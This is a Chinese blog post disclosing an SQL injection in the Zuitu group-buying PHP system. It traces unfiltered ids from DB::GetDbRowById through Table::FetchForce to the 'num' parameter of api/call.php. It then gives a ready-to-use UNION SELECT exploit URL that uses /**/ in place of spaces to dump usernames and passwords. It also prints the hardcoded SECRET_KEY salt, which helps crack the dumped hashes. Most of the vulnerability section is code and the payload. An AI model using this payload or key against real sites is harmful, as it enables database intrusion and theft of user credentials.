最土团购0day

最新推荐文章于 2020-12-25 19:58:53 发布
最新推荐文章于 2020-12-25 19:58:53 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: 最土团购
先看页面:./include/library/DB.class.php,代码如下:
 
—————code—————–
    static public function GetDbRowById($table, $ids=array()) { 
        $one = is_array($ids) ? false : true;
        settype($ids, ‘array’);
                //var_dump($ids);
        $idstring = join(‘\’,\”, $ids);
                            
        if(preg_match(‘/[\s]/’, $idstring)) return array();//不可以有空格,用/**/代替 
        $q = “SELECT * FROM `{$table}` WHERE id IN (‘{$idstring}’)”;
                //var_dump($q);
        $r = self::GetQueryResult($q, $one);//没有过滤,直接查询了
        if ($one) return $r;
        return Utility::AssColumn($r, ‘id’);
    }
——————code—————
然后搜索函数GetDbRowById(),发现只有在文件:./include/library/Table.class.php中有调用,代码如下:
 
 
——————–code0————–
    static private function _Fetch($n=null, $ids=array()) {
        $r = Cache::GetObject($n, $ids);
        $diff = array_diff($ids, array_keys($r));
        if(!$diff) return $r;
        $rr = DB::GetDbRowById($n, array_values($diff));
        Cache::SetObject($n, $rr);
        $r = array_merge($r, $rr);
        return Utility::SortArray($r, $ids, ‘id’);
    }
           
    static public function FetchForce($n=null, $ids=array()) {
        if ( empty($ids) || !$ids ) return array();
        $single = is_array($ids) ? false : true;
        settype($ids, ‘array’); $ids = array_values($ids);
        $ids = array_diff($ids, array(NULL));
                //var_dump($ids);
           
        $r = DB::GetDbRowById($n, $ids);
                //var_dump($r);
        Cache::SetObject($n, $r);
        return $single ? array_pop($r):Utility::SortArray($r,$ids,’id’); 
    }   
———————-code———————
然后跟踪搜索函数static public function FetchForce(),发现有很多页面都有调用。

 
 
刚开始的时候随便找了个页面看,结果不爆错,不过从输出的调试语句看,确实是可以注入。既然不能爆错,就只能找可以显示结果的页面来联合查询了。找到页面./api/call.php,部分代码如下:
 —————–code————–
<?php
require_once(dirname(dirname(__FILE__)) . ‘/app.php’);
        
$action = strval($_GET['action']);
$callerid = strval($_GET['callerid']);
$cid = strval($_GET['num']);//这里是外界提交的数据
$sec = strval($_GET['secret']);
$allow = array(‘query’,'consume’);
if (false==in_array($action, $allow))  redirect(WEB_ROOT . ‘/index.php’); 
        
header(‘Content-Type: application/xml; charset=UTF-8′);
//优惠券查询
if($action == ‘query’) {
    $coupon = Table::FetchForce(‘coupon’, $cid);
    $partner = Table::Fetch(‘partner’, $coupon['partner_id']);
    $team = Table::Fetch(‘team’, $coupon['team_id']);
    $e = date(‘Y-m-d’, $team['expire_time']);
…..
…..
…..
————code—————————
利用语句:
 
http://www.2cto.com /api/call.php?action=query&num=123′%29/**/union/**/select/**/1,2,3,concat(0x7e,0×27,username,0x7e,0×27,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23
不过密码有点坑,加了SECRET_KEY的。页面./include/classes/ZUser.class.php,代码如下:
 
 
———————-code————–
    const SECRET_KEY = ‘@4!@#$%@’;
        
    static public function GenPassword($p) { 
        return md5($p . self::SECRET_KEY);
    }
—————code———————
 
作者:qingsh4n
7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最土团购最土模板
11-15
最土团购-新版秀团网团购模板支持横排分类 红色模板
最土团购程序 2.0 20120502
05-01
最土团购程序是基于Web应用的B/S架构的团购网站建设解决方案的建站系统。它可以让用户高效、快速、低成本的构建个性化、专业化、强大功能的团购网站。最土团购系统是国内最专业、功能最强大的GroupOn模式的免费开源团购系统平台,专业技术团队、完美用户体验与极佳的性能,立足为用户提供最值得信赖的免费开源网上团购系统。 安装说明: (1)软件要求:空间必须支持PHP5/MYSQL5,PHP必须开启Php-mbstring、Php-gd两项模块 (2)下载最新程序包解压并上传到空间根目录中执行安装 (3)进入安装界面,填写MYSQL地址,通常为本地地址localhost,输入MYSQL的账号和密码 (4)安装完成后针对install.php文件进行删除,确保网站安全 (5)访问网站首页,注册第一个网站账号(默认拥有最高管理员权限) (6)使用第一个网站账号登陆网站,在网站下方有“管理最土”,进入后台进行相关设置
最土团购源码最新版,含25套精品模板[PHP+MYSQL]
weixin_34405925的博客
08-30 536
说明: 最土最新版,补丁已打好,含25套模板。淘宝卖的人很多。分享给大家。 安装与调试说明: 1、通过执行 install.php完成安装向导。 2、安装后,第一个注册的用户,为系统管理员;管理入口,在页面最底部,中央部位。 图就不上了。。。。反正别人测试的了。然后我转载过来的!!有问题别找我。找我也不会!! 下载此源码 ...
最土团购_补丁已打_25套模板
02-24
本程序是最新的最土团购商业版,带有25套模板。供学习和研究使用!
最土团购系统最新商业版
11-03
最土团购系统是国内最专业、功能最强大的GroupOn模式的免费开源团购系统平台,专业技术团队、完美用户体验与极佳的性能,立足为用户提供最值得信赖的免费开源网上团购系统。 最土团购系统v2.0商业版 使用说明: (1)软件要求:空间必须支持PHP5/MYSQL5,PHP必须开启Php-mbstring、Php-gd两项模块 (2)下载最新程序包解压并上传到空间根目录中执行安装 (3)进入安装界面,填写MYSQL地址,通常为本地地址localhost,输入MYSQL的账号和密码 (4)安装完成后针对install.php文件进行删除,确保网站安全 (5)访问网站首页,注册第一个网站账号(默认拥有最高管理员权限) (6)使用第一个网站账号登陆网站,在网站下方有“管理最土”,进入后台进行相关设置
iOS最全学习资源汇总
DCSnail-蜗牛
04-07 1万+
目录: 第一部分: iOS 学习资源整理(包括视频/教程/博客/书记/插件/社区/网站) 第一部分: iOS 各大牛博客列表 第一部分: iOS github 上托管的各类第三方       ---------------------------------------------------------------------------------------------------...
盘点python工具包并优化pip下载加速
点点的博客
08-19 2万+
1、优化pip下载加速 2、vscode使用安装环境python 3、python相关工具包与方法 3.1、Bilibili.com(B站)数据下载工具包 开源地址:https://github.com/wolfbolin/BiliUtil 安装命令:pip install Bi
二十三又是谁的二十三
热门推荐
weixin_48897289的博客
12-25 2万+
23 岁那年你正处在哪个状态?现在呢? 我,23岁,应届毕业生。生活,工作,爱情都处于人生的低谷,一穷二白,一无所有,一事无成。 分享一下成长的建议吧。 匿名用户 23岁那年…就是去年… 在22岁的时候我毕业,同时第二年准备考研,结果因为压力太大,期望太高,又失利了,但是我依然满怀信心和憧憬 在我23岁那年四月,当我深爱的女孩(在这之前我追了她四年)说她要去北京时,我在毫无准备的情况下,带了2000块钱冲到北京,那会的北京还有点冷…但是我只是想打好前站,在她来的时候能提供一点帮助,在前两周里,每天面试两家公
0day检测工具2023
最新发布
06-27
0day检测工具2023是一款专为网络安全领域设计的软件,主要用于发现和预防零日攻击(0day attack)。在信息安全行业中,"0day"一词指的是那些刚刚被发现、尚未有官方补丁或解决方案的漏洞,攻击者利用这些未知漏洞...
最土团购源码最新版
08-31
最土团购源码最新版14种
最土团购23221版本-无密码
04-17
最土团购系统是国内最专业、功能最强大的GroupOn模式的免费开源团购系统平台,专业技术团队、完美用户体验与极佳的性能,立足为用户提供最值得信赖的免费开源网上团购系统。
0day安全随书代码
08-08
0day安全是一个在信息安全领域非常重要的概念,它指的是那些尚未被公开、未被软件厂商修复的安全漏洞。这些漏洞被黑客利用来进行攻击,因为公众和软件供应商都对此一无所知,所以防御起来尤其困难。"0day安全随书...
0DAY与APT攻防.ppt
06-11
0DAY与APT攻防
0day漏洞检测
04-13
利用FUZZING技术检测漏洞,检测Activex插件的漏洞学习。
WX 0day上线CS.rar
04-21
【标题】"WX 0day上线CS.rar"指的是一个与WX平台相关的零日攻击(0day exploit)的利用工具包,其中包含了Cobalt Strike(CS)组件。零日攻击是指攻击者在软件供应商知晓并发布修复补丁之前就利用的未知漏洞。Cobalt...
zuitu 最土团购源码分析(一)前台部分
lineageII
04-04 702
无可厚非PHP还是普及度最高,最简单的语言。 想快速开发系统还是用PHP比较好。 初学PHP,那就以现在最火的团购网站源码最土来做分析学习。   最土网站 http://www.zuitu.com/   开发工具 dreamwear xampp   前台分析 我们首先来看首页index.php的源码   &lt;?php require_once(dirname(__...
最土团购程序 注册代码 分析
YoungerChen的专栏
07-10 2420
require_once(dirname(dirname(__FILE__)) . '/app.php'); if ( $_POST ) { verify_captcha('verifyregister', WEB_ROOT . '/account/signup.php');
最土团购程序一些常见的数据库操作
weixin_34342207的博客
09-18 280
我们在对最土程序进行二次开发的过程中。我们常常需要对数据库进行操作.最土程序的数据库操作方式还不少。我们将陆续总结最土程序的一些常见的数据库操作方式.      1:如何取得最土数据库中一条数据。使用LimitQuery()      $res = DB::LimitQuery('subscribe',array('condition'=&gt;array('email'=&gt;$email...
gitlab 0day
09-19
gitlab是一个开源的版本控制系统和协作平台,用于管理和追踪代码的变更。引用[1]提供了一个使用podman运行GitLab...至于gitlab 0day,根据提供的引用,没有提到任何关于gitlab 0day的信息。因此,我无法回答这个问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值